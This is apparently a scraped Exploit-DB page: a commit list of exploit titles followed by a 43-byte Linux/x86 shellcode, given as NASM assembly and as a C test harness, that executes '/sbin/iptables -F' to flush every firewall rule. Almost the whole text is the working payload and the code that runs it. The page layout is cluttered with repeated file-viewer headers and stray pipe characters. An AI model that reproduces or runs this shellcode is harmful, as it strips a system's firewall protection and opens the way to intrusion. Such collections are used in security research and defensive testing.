a37e3008e5
20 changes to exploits/shellcodes Microsoft Edge Chakra 1.11.4 - Read Permission via Type Confusion FileZilla 3.40.0 - 'Local search' / 'Local site' Denial of Service (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (1) STOPzilla AntiMalware 6.5.2.59 - Privilege Escalation (2) symphony CMS 2.3 - Multiple Vulnerabilities Symphony CMS 2.3 - Multiple Vulnerabilities Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution zzzphp CMS 1.6.1 - Cross-Site Request Forgery Splunk Enterprise 7.2.4 - Custom App RCE (Persistent Backdoor - Custom Binary Payload) Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) OOP CMS BLOG 1.0 - Multiple SQL Injection OOP CMS BLOG 1.0 - Multiple Cross-Site Request Forgery CMSsite 1.0 - Multiple Cross-Site Request Forgery elFinder 2.1.47 - Command Injection vulnerability in the PHP connector MarcomCentral FusionPro VDP Creator < 10.0 - Directory Traversal Bolt CMS 3.6.4 - Cross-Site Scripting Craft CMS 3.1.12 Pro - Cross-Site Scripting WordPress Plugin Cerber Security_ Antispam & Malware Scan 8.0 - Multiple Bypass Vulnerabilities Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting Linux/x86 - NOT Encoder / Decoder - execve() /bin/sh Shellcode (44 bytes) Linux/x64 - Kill All Processes Shellcode (11 bytes) Linux/x86 - iptables -F Shellcode (43 bytes)
55 lines
No EOL
1.1 KiB
C
55 lines
No EOL
1.1 KiB
C
/**********************************************/
|
|
/* linux/x86 iptables -F Length: 43 bytes */
|
|
/* */
|
|
/* 03/01/2019 */
|
|
/* */
|
|
/* Author: Cameron Brown */
|
|
/* */
|
|
/* Email: pwoerTF@gmail.com */
|
|
/**********************************************/
|
|
|
|
global _start
|
|
|
|
section .text
|
|
|
|
_start:
|
|
jmp short get
|
|
code:
|
|
pop ebx
|
|
cdq
|
|
mov [ebx+0xe], dl
|
|
|
|
lea eax, [ebx+0xf]
|
|
push edx
|
|
push eax
|
|
push ebx
|
|
mov ecx, esp
|
|
|
|
mov eax, edx
|
|
mov al, 0xb
|
|
int 0x80
|
|
get:
|
|
call code
|
|
file: db "/sbin/iptables#-F"
|
|
|
|
|
|
--------------------------------------------------
|
|
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
|
|
unsigned char code[] = \
|
|
"\xeb\x13\x5b\x99\x88\x53\x0e\x8d\x43\x0f\x52\x50\x53\x89\xe1\x89\xd0\xb0\x0b\xcd\x80\xe8\xe8\xff\xff\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73\x23\x2d\x46";
|
|
|
|
main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |